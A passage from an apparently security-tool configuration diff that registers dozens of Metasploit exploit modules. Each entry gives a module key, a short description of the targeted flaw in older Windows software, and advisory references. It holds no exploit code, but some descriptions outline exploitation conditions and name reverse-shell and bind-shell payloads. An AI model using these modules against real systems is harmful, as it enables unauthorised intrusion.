\t\t\t\tNOTE: this exploit isn't very reliable. Unfortunately reaching the\n\ + \t\t\t\tvulnerable code can only be done when manually checking mail (Ctrl-M).\n\ + \t\t\t\tChecking at startup will not reach the code targeted here.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3837 + - - OSVDB + - "59262 " + - - URL + - http://www.exploit-db.com/exploits/10235 + path: extensions/metasploit/ + class: Msf_module +msf_netcat110_nt: + enable: true + msf: true + msf_key: windows/misc/netcat110_nt + name: Netcat v1.10 NT Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Netcat v1.10 NT. By sending\n\ + \t\t\t\t\tan overly long string we are able to overwrite SEH. The vulnerability\n\ + \t\t\t\t\texists when netcat is used to bind (-e) an executable to a port in doexec.c.\n\ + \t\t\t\t\tThis module tested successfully using \"c:\\>nc -L -p 31337 -e ftp\".\n\ + \t\t\t\t" + authors: + - - CVE + - 2004-1317 + - - OSVDB + - "12612" + - - BID + - "12106" + - - URL + - http://www.milw0rm.com/exploits/726 + path: extensions/metasploit/ + class: Msf_module +msf_doubletake: + enable: true + msf: true + msf_key: windows/misc/doubletake + name: DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the authentication mechanism of\n\ + \t\t\t\t\tNSI Doubletake which is also rebranded as HP Storage Works. This vulnerability\n\ + \t\t\t\t\twas found by Titon of Bastard Labs.\n\ + \t\t\t" + authors: + - - CVE + - 2008-1661 + - - OSVDB + - "45924" + path: extensions/metasploit/ + class: Msf_module +msf_borland_interbase: + enable: true + msf: true + msf_key: windows/misc/borland_interbase + name: Borland Interbase Create-Request Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Borland Interbase 2007.\n\ + \t\t\t\tBy sending a specially crafted create-request packet, a remote\n\ + \t\t\t\tattacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-3566 + - - OSVDB + - "38602" + - - URL + - http://dvlabs.tippingpoint.com/advisory/TPTI-07-13 + path: extensions/metasploit/ + class: Msf_module +msf_bcaaa_bof: + enable: true + msf: true + msf_key: windows/misc/bcaaa_bof + name: Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),\n\ + \t\t\t\twhich comes as part of the Blue Coat Authentication proxy. Please note that by default,\n\ + \t\t\t\tthis exploit will attempt up to three times in order to successfully gain remote code\n\ + \t\t\t\texecution (in some cases, it takes as many as five times). This can cause your activity\n\ + \t\t\t\tto look even more suspicious. To modify the number of exploit attempts, set the\n\ + \t\t\t\tATTEMPTS option.\n\ + \t\t\t" + authors: + - - OSVDB + - "72095" + - - URL + - https://kb.bluecoat.com/index?page=content&id=SA55 + - - URL + - http://seclists.org/bugtraq/2011/Jul/44 + path: extensions/metasploit/ + class: Msf_module +msf_bopup_comm: + enable: true + msf: true + msf_key: windows/misc/bopup_comm + name: Bopup Communications Server Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.\n\ + \t\t\t\t\tBy sending a specially crafted packet, an attacker may be\n\ + \t\t\t\t\table to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-2227 + - - OSVDB + - "55275" + - - URL + - http://www.blabsoft.com/products/server + - - URL + - http://milw0rm.com/exploits/9002 + path: extensions/metasploit/ + class: Msf_module +msf_fb_svc_attach: + enable: true + msf: true + msf_key: windows/misc/fb_svc_attach + name: Firebird Relational Database SVC_attach() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\ + \t\t\t\tby sending a specially crafted service attach request.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5243 + - - OSVDB + - "38605" + - - BID + - "25917" + - - URL + - http://www.risesecurity.org/advisories/RISE-2007002.txt + path: extensions/metasploit/ + class: Msf_module +msf_ms05_030_nntp: + enable: true + msf: true + msf_key: windows/nntp/ms05_030_nntp + name: Microsoft Outlook Express NNTP Response Parsing Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the news reader of Microsoft\n\ + \t\t\t\tOutlook Express.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1213 + - - OSVDB + - "17306" + - - BID + - "13951" + - - MSB + - MS05-030 + path: extensions/metasploit/ + class: Msf_module +msf_nmap_stor: + enable: true + msf: true + msf_key: windows/novell/nmap_stor + name: Novell NetMail <= 3.52d NMAP STOR Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR\n\ + \t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\ + \t\t\t\tbuffer and control program execution.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6424 + - - OSVDB + - "31363" + - - BID + - "21725" + path: extensions/metasploit/ + class: Msf_module +msf_groupwisemessenger_client: + enable: true + msf: true + msf_key: windows/novell/groupwisemessenger_client + name: Novell GroupWise Messenger Client Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell's GroupWise Messenger Client.\n\ + \t\t\t\tBy sending a specially crafted HTTP response, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-2703 + - - OSVDB + - "46041" + - - BID + - "29602" + - - URL + - http://www.infobyte.com.ar/adv/ISR-17.html + path: extensions/metasploit/ + class: Msf_module +msf_zenworks_desktop_agent: + enable: true + msf: true + msf_key: windows/novell/zenworks_desktop_agent + name: Novell ZENworks 6.5 Desktop/Server Management Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a heap overflow in the Novell ZENworks\n\ + \t\t\t\tDesktop Management agent. This vulnerability was discovered\n\ + \t\t\t\tby Alex Wheeler.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1543 + - - OSVDB + - "16698" + - - BID + - "13678" + path: extensions/metasploit/ + class: Msf_module +msf_ms04_045_wins: + enable: true + msf: true + msf_key: windows/wins/ms04_045_wins + name: Microsoft WINS Service Memory Overwrite + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits an arbitrary memory write flaw in the\n\ + \t\t\t\tWINS service. This exploit has been tested against Windows\n\ + \t\t\t\t2000 only.\n\n\ + \t\t\t" + authors: + - - CVE + - 2004-1080 + - - OSVDB + - "12378" + - - BID + - "11763" + - - MSB + - MS04-045 + path: extensions/metasploit/ + class: Msf_module +msf_xlink_nfsd: + enable: true + msf: true + msf_key: windows/nfs/xlink_nfsd + name: Omni-NFS Server Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2\n\ + \t\t\t\tWhen sending a specially crafted nfs packet, an attacker may be able\n\ + \t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5780 + - - OSVDB + - "30224" + - - BID + - "20941" + - - URL + - http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm + path: extensions/metasploit/ + class: Msf_module +msf_safenet_ike_11: + enable: true + msf: true + msf_key: windows/vpn/safenet_ike_11 + name: SafeNet SoftRemote IKE Service Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Safenet SoftRemote IKE IreIKE.exe\n\ + \t\t\t\tservice. When sending a specially crafted udp packet to port 62514 an\n\ + \t\t\t\tattacker may be able to execute arbitrary code. This module has\n\ + \t\t\t\tbeen tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using\n\ + \t\t\t\twindows/meterpreter/reverse_ord_tcp payloads.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1943 + - - OSVDB + - "54831" + - - BID + - "35154" + - - URL + - http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1 + path: extensions/metasploit/ + class: Msf_module +msf_putty_msg_debug: + enable: true + msf: true + msf_key: windows/ssh/putty_msg_debug + name: PuTTy.exe <= v0.53 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the PuTTY SSH client that is triggered\n\ + \t\t\t\tthrough a validation error in SSH.c.\n\ + \t\t\t" + authors: + - - CVE + - 2002-1359 + - - OSVDB + - "8044" + - - URL + - http://www.rapid7.com/advisories/R7-0009.html + - - BID + - "6407" + path: extensions/metasploit/ + class: Msf_module +msf_freesshd_key_exchange: + enable: true + msf: true + msf_key: windows/ssh/freesshd_key_exchange + name: FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.\n\ + \t\t\t\tThis flaw is due to a buffer overflow error when handling a specially\n\ + \t\t\t\tcrafted key exchange algorithm string received from an SSH client.\n\ + \t\t\t" + authors: + - - CVE + - 2006-2407 + - - OSVDB + - "25463" + - - BID + - "17958" + path: extensions/metasploit/ + class: Msf_module +msf_freeftpd_key_exchange: + enable: true + msf: true + msf_key: windows/ssh/freeftpd_key_exchange + name: FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a simple stack buffer overflow in FreeFTPd 1.0.10\n\ + \t\t\t\tThis flaw is due to a buffer overflow error when handling a specially\n\ + \t\t\t\tcrafted key exchange algorithm string received from an SSH client.\n\ + \t\t\t\tThis module is based on MC's freesshd_key_exchange exploit.\n\ + \t\t\t" + authors: + - - CVE + - 2006-2407 + - - OSVDB + - "25569" + - - BID + - "17958" + path: extensions/metasploit/ + class: Msf_module +msf_securecrt_ssh1: + enable: true + msf: true + msf_key: windows/ssh/securecrt_ssh1 + name: SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in SecureCRT <= 4.0\n\ + \t\t\t\tBeta 2. By sending a vulnerable client an overly long\n\ + \t\t\t\tSSH1 protocol identifier string, it is possible to execute\n\ + \t\t\t\tarbitrary code.\n\n\ + \t\t\t\tThis module has only been tested on SecureCRT 3.4.4.\n\ + \t\t\t" + authors: + - - CVE + - 2002-1059 + - - OSVDB + - "4991" + - - BID + - "5287" + path: extensions/metasploit/ + class: Msf_module +msf_alphastor_agent: + enable: true + msf: true + msf_key: windows/emc/alphastor_agent + name: EMC AlphaStor Agent Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in EMC AlphaStor 3.1.\n\ + \t\t\t\tBy sending a specially crafted message, an attacker may\n\ + \t\t\t\tbe able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-2158 + - - OSVDB + - "45714" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=702 + path: extensions/metasploit/ + class: Msf_module +msf_java_docbase_bof: + enable: true + msf: true + msf_key: windows/browser/java_docbase_bof + name: Sun Java Runtime New Plugin docbase Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a flaw in the new plugin component of the Sun Java\n\ + \t\t\t\tRuntime Environment before v6 Update 22. By specifying specific parameters\n\ + \t\t\t\tto the new plugin, an attacker can cause a stack-based buffer overflow and\n\ + \t\t\t\texecute arbitrary code.\n\n\ + \t\t\t\tWhen the new plugin is invoked with a \"launchjnlp\" parameter, it will\n\ + \t\t\t\tcopy the contents of the \"docbase\" parameter to a stack-buffer using the\n\ + \t\t\t\t\"sprintf\" function. A string of 396 bytes is enough to overflow the 256\n\ + \t\t\t\tbyte stack buffer and overwrite some local variables as well as the saved\n\ + \t\t\t\treturn address.\n\n\ + \t\t\t\tNOTE: The string being copied is first passed through the \"WideCharToMultiByte\".\n\ + \t\t\t\tDue to this, only characters which have a valid localized multibyte\n\ + \t\t\t\trepresentation are allowed. Invalid characters will be replaced with\n\ + \t\t\t\tquestion marks ('?').\n\n\ + \t\t\t\tThis vulnerability was originally discovered independently by both Stephen\n\ + \t\t\t\tFewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't\n\ + \t\t\t\tbeen done, all versions since version 6 Update 10 are believed to be affected\n\ + \t\t\t\tby this vulnerability.\n\n\ + \t\t\t\tThis vulnerability was patched as part of the October 2010 Oracle Patch\n\ + \t\t\t\trelease.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3552 + - - OSVDB + - "68873" + - - BID + - "44023" + - - URL + - http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-206/ + - - URL + - http://code.google.com/p/skylined/issues/detail?id=23 + - - URL + - http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/ + - - URL + - http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html + path: extensions/metasploit/ + class: Msf_module +msf_adobe_flashplayer_avm: + enable: true + msf: true + msf_key: windows/browser/adobe_flashplayer_avm + name: Adobe Flash Player AVM Bytecode Verification Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33\n\ + \t\t\t\tand earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification\n\ + \t\t\t\tlogic. This results in unsafe JIT(Just-In-Time) code being executed.\n\n\ + \t\t\t\t\tSpecifically, this issue results in uninitialized memory being referenced and later \n\ + \t\t\t\texecuted. Taking advantage of this issue relies on heap spraying and controlling the\n\ + \t\t\t\tuninitialized memory. \n\n\ + \t\t\t\t\tCurrently this exploit works for IE6, IE7, and Firefox 3.6 and likely several \n\ + \t\t\t\tother browsers. DEP does catch the exploit and causes it to fail. Due to the nature\n\ + \t\t\t\tof the uninitialized memory its fairly difficult to get around this restriction.\n\ + \t\t\t\t" + authors: + - - CVE + - 2011-0609 + - - OSVDB + - "71254" + - - URL + - http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html + - - URL + - http://www.adobe.com/devnet/swf.html + - - URL + - http://www.adobe.com/support/security/advisories/apsa11-01.html + path: extensions/metasploit/ + class: Msf_module +msf_adobe_jbig2decode: + enable: true + msf: true + msf_key: windows/fileformat/adobe_jbig2decode + name: Adobe JBIG2Decode Memory Corruption Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.\n\ + \t\t\t\t\tThis module relies upon javascript for the heap spray.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0658 + - - OSVDB + - "52073" + - - URL + - http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html + path: extensions/metasploit/ + class: Msf_module +msf_windvd7_applicationtype: + enable: true + msf: true + msf_key: windows/browser/windvd7_applicationtype + name: WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in IASystemInfo.dll ActiveX\n\ + \t\t\t\tcontrol in InterVideo WinDVD 7. By sending a overly long string\n\ + \t\t\t\tto the \"ApplicationType()\" property, an attacker may be able to\n\ + \t\t\t\texecute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-0348 + - - OSVDB + - "34315" + - - BID + - "23071" + path: extensions/metasploit/ + class: Msf_module +msf_ms06_071_xml_core: + enable: true + msf: true + msf_key: windows/browser/ms06_071_xml_core + name: Internet Explorer XML Core Services HTTP Request Handling + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a code execution vulnerability in Microsoft XML Core Services which\n\ + \t\t\t\texists in the XMLHTTP ActiveX control. This module is the modifed version of\n\ + \t\t\t\thttp://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully\n\ + \t\t\t\ttested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6\n\ + \t\t\t\t+ Microsoft XML Core Services 4.0 SP2.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5745 + - - OSVDB + - "29425" + - - MSB + - MS06-071 + - - BID + - "20915" + path: extensions/metasploit/ + class: Msf_module +msf_juniper_sslvpn_ive_setupdll: + enable: true + msf: true + msf_key: windows/browser/juniper_sslvpn_ive_setupdll + name: Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in the JuniperSetupDLL.dll\n\ + \t\t\t\tlibrary which is called by the JuniperSetup.ocx ActiveX\tcontrol,\n\ + \t\t\t\tas part of the Juniper SSL-VPN (IVE) appliance. By specifying an\n\ + \t\t\t\toverly long string to the ProductName object parameter, the stack\n\ + \t\t\t\tis overwritten.\n\ + \t\t\t" + authors: + - - CVE + - 2006-2086 + - - OSVDB + - "25001" + - - BID + - "17712" + - - URL + - http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0743.html + path: extensions/metasploit/ + class: Msf_module +msf_apple_itunes_playlist: + enable: true + msf: true + msf_key: windows/browser/apple_itunes_playlist + name: Apple ITunes 4.7 Playlist Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Apple ITunes 4.7\n\ + \t\t\t\tbuild 4.7.0.42. By creating a URL link to a malicious PLS\n\ + \t\t\t\tfile, a remote attacker could overflow a buffer and execute\n\ + \t\t\t\tarbitrary code. When using this module, be sure to set the\n\ + \t\t\t\tURIPATH with an extension of '.pls'.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0043 + - - OSVDB + - "12833" + - - BID + - "12238" + path: extensions/metasploit/ + class: Msf_module +msf_tumbleweed_filetransfer: + enable: true + msf: true + msf_key: windows/browser/tumbleweed_filetransfer + name: Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the vcst_eu.dll\n\ + \t\t\t\tFileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed\n\ + \t\t\t\tSecureTransport suite. By sending an overly long string to the\n\ + \t\t\t\tTransferFile() 'remotefile' function, an attacker may be able\n\ + \t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-1724 + - - OSVDB + - "44252" + - - URL + - http://www.aushack.com/200708-tumbleweed.txt + path: extensions/metasploit/ + class: Msf_module +msf_ms10_046_shortcut_icon_dllloader: + enable: true + msf: true + msf_key: windows/browser/ms10_046_shortcut_icon_dllloader + name: Microsoft Windows Shell LNK Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the handling of Windows\n\ + \t\t\t\tShortcut files (.LNK) that contain an icon resource pointing to a\n\ + \t\t\t\tmalicious DLL. This module creates a WebDAV service that can be used\n\ + \t\t\t\tto run an arbitrary payload when accessed as a UNC path.\n\ + \t\t\t" + authors: + - - CVE + - 2010-2568 + - - OSVDB + - "66387" + - - MSB + - MS10-046 + - - URL + - http://www.microsoft.com/technet/security/advisory/2286198.mspx + path: extensions/metasploit/ + class: Msf_module +msf_mcafeevisualtrace_tracetarget: + enable: true + msf: true + msf_key: windows/browser/mcafeevisualtrace_tracetarget + name: McAfee Visual Trace ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX\n\ + \t\t\t\tControl (NeoTraceExplorer.dll 1.0.0.1). By sending a overly long string to the\n\ + \t\t\t\t\"TraceTarget()\" method, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6707 + - - OSVDB + - "32399" + - - URL + - http://secunia.com/advisories/23463 + path: extensions/metasploit/ + class: Msf_module +msf_orbit_connecting: + enable: true + msf: true + msf_key: windows/browser/orbit_connecting + name: Orbit Downloader Connecting Log Creation Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an\n\ + \t\t\t\tattacker serves up a malicious web site, abritrary code may be executed.\n\ + \t\t\t\tThe PAYLOAD windows/shell_bind_tcp works best.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0187 + - - OSVDB + - "52294" + - - BID + - "33894" + path: extensions/metasploit/ + class: Msf_module +msf_kazaa_altnet_heap: + enable: true + msf: true + msf_key: windows/browser/kazaa_altnet_heap + name: Kazaa Altnet Download Manager ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Altnet Download Manager ActiveX\n\ + \t\t\t\tControl (amd4.dll) bundled with Kazaa Media Desktop 3.2.7.\n\ + \t\t\t\tBy sending a overly long string to the \"Install()\" method, an attacker may be\n\ + \t\t\t\table to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5217 + - - OSVDB + - "37785" + - - URL + - http://secunia.com/advisories/26970/ + path: extensions/metasploit/ + class: Msf_module +msf_ms08_041_snapshotviewer: + enable: true + msf: true + msf_key: windows/browser/ms08_041_snapshotviewer + name: Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module allows remote attackers to place arbitrary files on a users file system\n\ + \t\t\t\tvia the Microsoft Office Snapshot Viewer ActiveX Control.\n\ + \t\t\t" + authors: + - - CVE + - 2008-2463 + - - OSVDB + - "46749" + - - MSB + - MS08-041 + - - BID + - "30114" + path: extensions/metasploit/ + class: Msf_module +msf_java_codebase_trust: + enable: true + msf: true + msf_key: windows/browser/java_codebase_trust + name: Sun Java Applet2ClassLoader Remote Code Execution Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the Java Runtime Environment\n\ + \t\t\t\tthat allows an attacker to run an applet outside of the Java Sandbox. When\n\ + \t\t\t\tan applet is invoked with:\n\n\ + \t\t\t\t1. A \"codebase\" parameter that points at a trusted directory\n\ + \t\t\t\t2. A \"code\" parameter that is a URL that does not contain any dots\n\n\ + \t\t\t\tthe applet will run outside of the sandbox.\n\n\ + \t\t\t\tThis vulnerability affects JRE prior to version 6 update 24.\n\ + \t\t\t" + authors: + - - CVE + - 2010-4452 + - - OSVDB + - "71193" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-11-084/ + - - URL + - http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/ + - - URL + - http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html + path: extensions/metasploit/ + class: Msf_module +msf_awingsoft_web3d_bof: + enable: true + msf: true + msf_key: windows/browser/awingsoft_web3d_bof + name: AwingSoft Winds3D Player SceneURL Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a data segment buffer overflow within Winds3D Viewer of\n\ + \t\t\t\tAwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of\n\ + \t\t\t\tAwingSoft Web3D Player.\n\ + \t\t\t\tBy setting an overly long value to the 'SceneURL' property, an attacker can\n\ + \t\t\t\toverrun a buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-4588 + - - OSVDB + - "60017" + - - URL + - http://www.milw0rm.com/exploits/9116 + - - URL + - http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txt + - - URL + - http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/ + path: extensions/metasploit/ + class: Msf_module +msf_aim_goaway: + enable: true + msf: true + msf_key: windows/browser/aim_goaway + name: AOL Instant Messenger goaway Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a flaw in the handling of AOL Instant\n\ + \t\t\t\tMessenger's 'goaway' URI handler. An attacker can execute\n\ + \t\t\t\tarbitrary code by supplying a overly sized buffer as the\n\ + \t\t\t\t'message' parameter. This issue is known to affect AOL Instant\n\ + \t\t\t\tMessenger 5.5.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0636 + - - OSVDB + - "8398" + - - BID + - "10889" + - - URL + - http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities + path: extensions/metasploit/ + class: Msf_module +msf_autodesk_idrop: + enable: true + msf: true + msf_key: windows/browser/autodesk_idrop + name: Autodesk IDrop ActiveX Control Heap Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a heap-based memory corruption vulnerability in\n\ + \t\t\t\tAutodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160.\n\ + \t\t\t\tAn attacker can execute arbitrary code by triggering a heap use after\n\ + \t\t\t\tfree condition using the Src, Background, PackageXml properties.\n\ + \t\t\t" + authors: + - - OSVDB + - "53265" + - - BID + - "34352" + - - URL + - http://www.milw0rm.com/exploits/8560 + - - URL + - http://marc.info/?l=full-disclosure&m=123870112214736 + path: extensions/metasploit/ + class: Msf_module +msf_aol_icq_downloadagent: + enable: true + msf: true + msf_key: windows/browser/aol_icq_downloadagent + name: America Online ICQ ActiveX Control Arbitrary File Download and Execute + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module allows remote attackers to download and execute arbitrary files\n\ + \t\t\t\ton a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5650 + - - OSVDB + - "30220" + - - BID + - "20930" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-06-037/ + path: extensions/metasploit/ + class: Msf_module +msf_aventail_epi_activex: + enable: true + msf: true + msf_key: windows/browser/aventail_epi_activex + name: SonicWALL Aventail epi.dll AuthCredential Format String Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a format string vulnerability within version 10.0.4.x and\n\ + \t\t\t\t10.5.1 of the SonicWALL Aventail SSL-VPN Endpoint Interrogator/Installer ActiveX\n\ + \t\t\t\tcontrol (epi.dll). By calling the 'AuthCredential' method with a specially\n\ + \t\t\t\tcrafted Unicode format string, an attacker can cause memory corruption and\n\ + \t\t\t\texecute arbitrary code.\n\n\ + \t\t\t\tUnfortunately, it does not appear to be possible to indirectly re-use existing\n\ + \t\t\t\tstack data for more reliable exploitation. This is due to several particulars\n\ + \t\t\t\tabout this vulnerability. First, the format string must be a Unicode string,\n\ + \t\t\t\twhich uses two bytes per character. Second, the buffer is allocated on the\n\ + \t\t\t\tstack using the 'alloca' function. As such, each additional format specifier (%x)\n\ + \t\t\t\twill add four more bytes to the size allocated. This results in the inability to\n\ + \t\t\t\tmove the read pointer outside of the buffer.\n\n\ + \t\t\t\tFurther testing showed that using specifiers that pop more than four bytes does\n\ + \t\t\t\tnot help. Any number of format specifiers will result in accessing the same value\n\ + \t\t\t\twithin the buffer.\n\n\ + \t\t\t\tNOTE: It may be possible to leverage the vulnerability to leak memory contents.\n\ + \t\t\t\tHowever, that has not been fully investigated at this time.\n\ + \t\t\t" + authors: + - - OSVDB + - "67286" + - - URL + - http://sotiriu.de/adv/NSOADV-2010-005.txt + path: extensions/metasploit/ + class: Msf_module +msf_hp_loadrunner_addfile: + enable: true + msf: true + msf_key: windows/browser/hp_loadrunner_addfile + name: Persits XUpload ActiveX AddFile Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Persits Software Inc's\n\ + \t\t\t\tXUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5.\n\ + \t\t\t\tBy passing an overly long string to the AddFile method, an attacker may be\n\ + \t\t\t\table to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-0492 + - - OSVDB + - "40762" + - - BID + - "27456" + - - URL + - http://www.milw0rm.com/exploits/4987 + - - URL + - http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html + path: extensions/metasploit/ + class: Msf_module +msf_novelliprint_datetime: + enable: true + msf: true + msf_key: windows/browser/novelliprint_datetime + name: Novell iPrint Client ActiveX Control Date/Time Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n\ + \t\t\t\tpassing a specially crafted date/time string via certain parameters to ienipp.ocx\n\ + \t\t\t\tan attacker can execute arbitrary code.\n\n\ + \t\t\t\tNOTE: The \"operation\" variable must be set to a valid command in order to reach this\n\ + \t\t\t\tvulnerability.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1569 + - - BID + - "37242" + - - OSVDB + - "60804" + - - URL + - http://secunia.com/advisories/35004/ + path: extensions/metasploit/ + class: Msf_module +msf_zenturiprogramchecker_unsafe: + enable: true + msf: true + msf_key: windows/browser/zenturiprogramchecker_unsafe + name: Zenturi ProgramChecker ActiveX Control Arbitrary File Download + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module allows remote attackers to place arbitrary files on a users file system\n\ + \t\t\t\tvia the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2987 + - - OSVDB + - "36715" + - - BID + - "24217" + path: extensions/metasploit/ + class: Msf_module +msf_realplayer_cdda_uri: + enable: true + msf: true + msf_key: windows/browser/realplayer_cdda_uri + name: RealNetworks RealPlayer CDDA URI Initialization Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a initialization flaw within RealPlayer 11/11.1 and \n\ + \t\t\t\tRealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object \n\ + \t\t\t\tinitialization failure. However, this failure is improperly handled and \n\ + \t\t\t\tuninitialized memory executed.\n\ + \t\t\t" + authors: + - - CVE + - 